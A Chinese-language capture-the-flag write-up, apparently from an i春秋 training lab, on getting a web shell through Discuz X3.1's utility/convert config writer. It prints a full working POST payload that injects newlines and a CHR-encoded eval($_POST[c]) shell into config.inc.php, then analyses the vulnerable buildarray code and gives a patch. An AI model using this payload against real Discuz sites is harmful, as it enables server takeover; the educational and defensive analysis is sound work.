Discuz x3.1 utility/convert/config.inc.php漏洞get shell

實驗環(huán)境

i 春秋 --- 競賽訓(xùn)練 -- 這不是DZ?
操作機: Windows XP
實驗工具:BURP休建、中國菜刀
目標:獲取www.test.ichunqiu網(wǎng)站的服務(wù)器權(quán)限鄙币。

信息搜集

這是一個純內(nèi)網(wǎng)環(huán)境税迷,與外界沒有聯(lián)網(wǎng)淤翔。滲透目標單一蚂夕,不需要做太多的信息搜集迅诬。

打開目標網(wǎng)站:

嗯,特別清楚的Discuz CMS婿牍。


圖片1.png

簡單分析一下CMS信息:Discuz侈贷! x3.1,顯然等脂。

信息搜集是可以考察一下技術(shù)支持單位俏蛮,檢查 “Powered by”信息。獲取CMS信息上遥,去網(wǎng)上找找有沒有他的開源代碼或是漏洞信息搏屑。

信息搜集之 漏洞信息搜集

利用百度、Google等搜索引擎搜集漏洞信息粉楚。(由于實驗環(huán)境沒有網(wǎng)辣恋,這些資料要在本地環(huán)境搜集)
這里可能會用到 Google hacking,搜索引擎語法模软。
漏洞信息 在一些漏洞平臺比如烏云伟骨、補天、seebug等都可能有燃异,當然有些可能要收費才能觀看携狭。

圖片2.png

隨便找了幾個,就找到了我們需要的回俐。https://www.exehack.net/134.html
漏洞:http://www.wooyun.org/bugs/wooyun-2010-045611

漏洞利用:

參加:https://bbs.ichunqiu.com/thread-1909-1-1.html
我有點懶得寫了逛腿,直接復(fù)制粘貼,待會直接寫源碼分析了

打開 www.test.ichunqiu/utility/convert

圖3 - 漏洞所在頁面

直接使用EXP吧

POST /utility/convert/index.php HTTP/1.1
Host: www.test.ichunqiu
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 199
Content-Type: application/x-www-form-urlencoded

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

其實其他都不重要仅颇,最后一句所傳的數(shù)據(jù)才是重點鳄逾!


圖4 - Burp修改數(shù)據(jù)包

上菜刀!拿shell灵莲!

地址:www.test.ichunqiu/utility/convert/data/config.inc.php 密碼:c

圖5 - 菜刀
圖6 - getshell

源碼分析

這漏洞出現(xiàn)在一個DZ X系列自帶的轉(zhuǎn)換工具里面雕凹!
漏洞路徑:utility/convert/data/config.inc.php在開始設(shè)置里面可以設(shè)置數(shù)據(jù)的屬性,而post的數(shù)據(jù)直接寫到了config.inc.php這個文件里面政冻,無任何過濾檢測枚抵!

我從網(wǎng)上下載了Discuz x3.1的源碼包,利用notepad++進行代碼審計明场。

payload

首先我們看一下完整的payload:

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

漏洞原理

index.php 文件分析

首先汽摹,打開 utility/convert/index.php 的源碼:

<?php


// 包含了common.inc.php文件
require './include/common.inc.php';

// 關(guān)于getgpc函數(shù) 在global_func.php 中。參考:http://blog.csdn.net/xavierdarkness/article/details/78062852
$action = getgpc('a');      // 取$_POST['a'],直接賦值給$action 苦锨,此時$action = config;
$action = empty($action) ? getgpc('action') : $action;     //此時 $action = config;
$source = getgpc('source') ? getgpc('source') : getgpc('s');    // $source = d7.2_x2.0 HTTP/1.1;
$step = getgpc('step');
$start = getgpc('start');

……省略部分源碼……

if($action == 'source') {
    require DISCUZ_ROOT.'./include/do_source.inc.php';
    // common.inc.php 如果config.inc.php文件不存在逼泣,就為true
} elseif($action == 'config' || CONFIG_EMPTY) {      // $action = config; 包含./include/do_config.inc.php 文件
    require DISCUZ_ROOT.'./include/do_config.inc.php';  
} elseif($action == 'setting') {
……省略 ……
?>

do_config.inc.php 文件分析

<?php

$configfile = DISCUZ_ROOT.'./data/config.inc.php';
$configfile_default = DISCUZ_ROOT.'./data/config.default.php';

// 創(chuàng)建config.inc.php
@touch($configfile);
// 檢查寫入權(quán)限
if(!is_writable($configfile)) {
    showmessage('config_write_error');
}

$config_default = loadconfig('config.default.php');      // 設(shè)置配置文件
$error = array();
// submitcheck()返回true趴泌,此函數(shù)定義在 include\global.func.php 文件中
if(submitcheck()) {
    $newconfig = getgpc('newconfig');   //取$_POST[newconfig]數(shù)據(jù)
/*此時newconfig[aaa
eval(eval("$_POST[c];"););//];
*/
    if(is_array($newconfig)) {
        $checkarray = $setting['config']['ucenter'] ? array('source', 'target', 'ucenter') : array('source', 'target');
        foreach ($checkarray as $key) {
            if(!empty($newconfig[$key]['dbhost'])) {
                $check = mysql_connect_test($newconfig[$key], $key);
                if($check < 0) {
                    $error[$key] = lang('mysql_connect_error_'.abs($check));
                }
            } else {
                $error[$key] = lang('mysql_config_error');
            }
        }
        //保存$newconfig到$configfile文件中,即config.inc.php文件拉庶。接下去查看一下這個函數(shù)吧嗜憔。
        save_config_file($configfile, $newconfig, $config_default);

        if(empty($error)) {
            $db_target = new db_mysql($newconfig['target']);
            $db_target->connect();
            delete_process('all');
            showmessage('config_success', 'index.php?a=select&source='.$source);
        }
    }
}

?>

函數(shù) save_config_file

所在文件:\utility\convert\include\global.func.php

function save_config_file($filename, $config, $default) {
    $config = setdefault($config, $default);           // 將$config中的空白項用 $default 中對應(yīng)項的值填充
// 聯(lián)系上下文,即將 './data/config.default.php'文件對應(yīng)項 賦值給 $newconfig 這個數(shù)組中對應(yīng)的空白項
// 此時的$config = $newconfig+config.default.php對應(yīng)項的補充
    $date = gmdate("Y-m-d H:i:s", time() + 3600 * 8);
    $year = date('Y');
    $content = <<<EOT
<?php


\$_config = array();

EOT;
        // 看下一步getvars函數(shù)氏仗,此時的$config = $newconfig+config.default.php對應(yīng)項的補充
    $content .= getvars(array('_config' => $config));
    $content .= "\r\n// ".str_pad('  THE END  ', 50, '-', STR_PAD_BOTH)." //\r\n\r\n?>";
    file_put_contents($filename, $content);
}

function setdefault($var, $default) {
    foreach ($default as $k => $v) {
        if(!isset($var[$k])) {
            $var[$k] = $default[$k];
        } elseif(is_array($v)) {
            $var[$k] = setdefault($var[$k], $default[$k]);
        }
    }
    return $var;
}

函數(shù) getvars

所在文件:\utility\convert\include\global.func.php

// $data = array('_config' => $config) 其中 $config = $newconfig+config.default.php對應(yīng)項的補充
function getvars($data, $type = 'VAR') {
    $evaluate = '';
    foreach($data as $key => $val) {
        if(!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $key)) {
            continue;
        }
        if(is_array($val)) {
            // 查看buildarray函數(shù)吉捶,$key 即為_config
            $evaluate .= buildarray($val, 0, "\${$key}")."\r\n";
        } else {
            $val = addcslashes($val, '\'\\');
            $evaluate .= $type == 'VAR' ? "\$$key = '$val';\n" : "define('".strtoupper($key)."', '$val');\n";
        }
    }
    return $evaluate;
}

buildarray函數(shù)

所在文件:\utility\convert\include\global.func.php

// 這里的$array=$config $level=0  $pre=$_config
function buildarray($array, $level = 0, $pre = '$_config') {
    static $ks;
    if($level == 0) {
        $ks = array();
        $return = '';
    }

    foreach ($array as $key => $val) {
        // 遍歷$config 中的 $key => $val ,  鍵值對應(yīng)項
        if($level == 0) {
            //str_pad — 使用另一個字符串填充字符串為指定長度
            // 第一個參數(shù)是要輸出的字符串,指定長度為50皆尔,用'-'填充呐舔,居中
            $newline = str_pad('  CONFIG '.strtoupper($key).'  ', 50, '-', STR_PAD_BOTH);
            /*
            這里是產(chǎn)生漏洞關(guān)鍵
            1. DISCUZ的本意是使用$config數(shù)組的key作為每一塊配置區(qū)域的"注釋標題"
            2. 寫入配置文件的$newline依賴于$key,而$key是攻擊者可控的
            3. 未對輸入數(shù)據(jù)進行正確的邊界處理慷蠕,導(dǎo)致攻擊者在輸入數(shù)據(jù)中插入換行符珊拼,逃離注釋的作用范圍,從而使輸入數(shù)據(jù)轉(zhuǎn)化為可執(zhí)行代碼
                1) 換行符
                2) ?>
            這類定界符都是可以達到同樣的效果的
            */
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val)) {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        } else {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}

攻擊造成的效果:

效果圖

newconfig部分對照ASCII碼轉(zhuǎn)換一下就是如下所示:(%0a%0d對應(yīng)Windows下的換行操作 \n\r)

newconfig[aaa
eval(eval("$_POST[c];"););//]=aaaa

這里我們就是通過%0a%0d進行換行操作來繞過注釋流炕,并成功將我們的惡意代碼寫入文件杆麸,不被注釋掉,從而導(dǎo)致我們可以通過菜刀直接連接浪感。

防御方法

\discuz\utility\convert\include\global.func.php

function buildarray($array, $level = 0, $pre = '$_config') 
{
  static $ks;
  if($level == 0){
     $ks = array();
     $return = '';
   }

  foreach ($array as $key => $val){ 
    //過濾掉$key中的非字母、數(shù)字及下劃線字符
    $key = preg_replace("/[^\w]/", "", $key);

    if($level == 0) {
      $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
      $return .= "\r\n// $newline //\r\n";
    }

    $ks[$level] = $ks[$level - 1]."['$key']";
    if(is_array($val)){
      $ks[$level] = $ks[$level - 1]."['$key']";
      $return .= buildarray($val, $level + 1, $pre);
    }else{
      $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
      $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
    }
  }
  return $return;
}

同一個漏洞別人寫的文章:http://www.cnblogs.com/LittleHann/p/4317665.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末饼问,一起剝皮案震驚了整個濱河市影兽,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌莱革,老刑警劉巖峻堰,帶你破解...
    沈念sama閱讀 206,482評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異盅视,居然都是意外死亡捐名,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,377評論 2 382
  • 文/潘曉璐 我一進店門闹击,熙熙樓的掌柜王于貴愁眉苦臉地迎上來镶蹋,“玉大人,你說我怎么就攤上這事赏半『毓椋” “怎么了?”我有些...
    開封第一講書人閱讀 152,762評論 0 342
  • 文/不壞的土叔 我叫張陵断箫,是天一觀的道長拂酣。 經(jīng)常有香客問我,道長仲义,這世上最難降的妖魔是什么婶熬? 我笑而不...
    開封第一講書人閱讀 55,273評論 1 279
  • 正文 為了忘掉前任剑勾,我火速辦了婚禮,結(jié)果婚禮上赵颅,老公的妹妹穿的比我還像新娘虽另。我一直安慰自己,他們只是感情好性含,可當我...
    茶點故事閱讀 64,289評論 5 373
  • 文/花漫 我一把揭開白布洲赵。 她就那樣靜靜地躺著,像睡著了一般商蕴。 火紅的嫁衣襯著肌膚如雪叠萍。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,046評論 1 285
  • 那天绪商,我揣著相機與錄音苛谷,去河邊找鬼。 笑死格郁,一個胖子當著我的面吹牛腹殿,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播例书,決...
    沈念sama閱讀 38,351評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼锣尉,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起测垛,我...
    開封第一講書人閱讀 36,988評論 0 259
  • 序言:老撾萬榮一對情侶失蹤序矩,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后拇厢,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 43,476評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡晒喷,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,948評論 2 324
  • 正文 我和宋清朗相戀三年孝偎,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片凉敲。...
    茶點故事閱讀 38,064評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡衣盾,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出爷抓,到底是詐尸還是另有隱情雨效,我是刑警寧澤,帶...
    沈念sama閱讀 33,712評論 4 323
  • 正文 年R本政府宣布废赞,位于F島的核電站徽龟,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏唉地。R本人自食惡果不足惜据悔,卻給世界環(huán)境...
    茶點故事閱讀 39,261評論 3 307
  • 文/蒙蒙 一传透、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧极颓,春花似錦朱盐、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,264評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至骇径,卻和暖如春躯肌,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背破衔。 一陣腳步聲響...
    開封第一講書人閱讀 31,486評論 1 262
  • 我被黑心中介騙來泰國打工清女, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人晰筛。 一個月前我還...
    沈念sama閱讀 45,511評論 2 354
  • 正文 我出身青樓嫡丙,卻偏偏與公主長得像,于是被迫代替她去往敵國和親读第。 傳聞我的和親對象是個殘疾皇子曙博,可洞房花燭夜當晚...
    茶點故事閱讀 42,802評論 2 345

推薦閱讀更多精彩內(nèi)容